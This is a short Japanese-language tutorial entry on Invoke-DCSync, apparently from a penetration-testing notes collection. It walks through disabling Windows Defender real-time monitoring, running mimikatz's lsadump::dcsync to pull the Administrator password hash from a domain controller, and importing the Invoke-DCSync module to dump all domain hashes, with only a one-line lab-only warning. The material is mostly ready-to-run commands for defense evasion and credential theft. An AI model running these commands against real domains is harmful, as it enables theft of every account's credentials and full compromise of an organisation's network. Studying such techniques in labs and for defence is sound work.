
Invoke-DCSync
Invoke-DCSync 参照: https://adsecurity.org/?p=1729 参照: https://silentbreaksecurity.com/invoke-dcsync-because-we-all-wanted-it/ 目的: mimikatz の DCSync 機能を使用して、ドメインコントローラー上のすべてのユーザーアカウントからパスワードハッシュを取得します。
警告:これはラボ環境でのみ行ってください。
mimikatz は DCSync と呼ばれるツールを実装しました。これにより、mimikatz はドメインコントローラーを偽装し、別のドメインコントローラーからすべてのパスワードハッシュの取得を試みることができます。
Windows Defender を無効にする必要があるかもしれません。
管理者として PowerShell を開き、次のように入力します。
$ Set-MpPreference -DisableRealtimeMonitoring $true
mimikatz を起動します。
$ lsadump::dcsync /domain:test.local /user:Administrator
これで、そのユーザーのパスワードハッシュが取得できました。
これには、Administrator アクセス権、具体的には Get-Replication-Changes-All Common Name 属性が必要です。
Invoke-DCSync モジュールを使用して、すべてのハッシュを抽出できます。
ダウンロード元: https://gist.github.com/monoxgas/9d238accd969550136db
$ Import-Module ./Invoke-DCSync.ps1
$ Invoke-DCSync -PWDumpFormat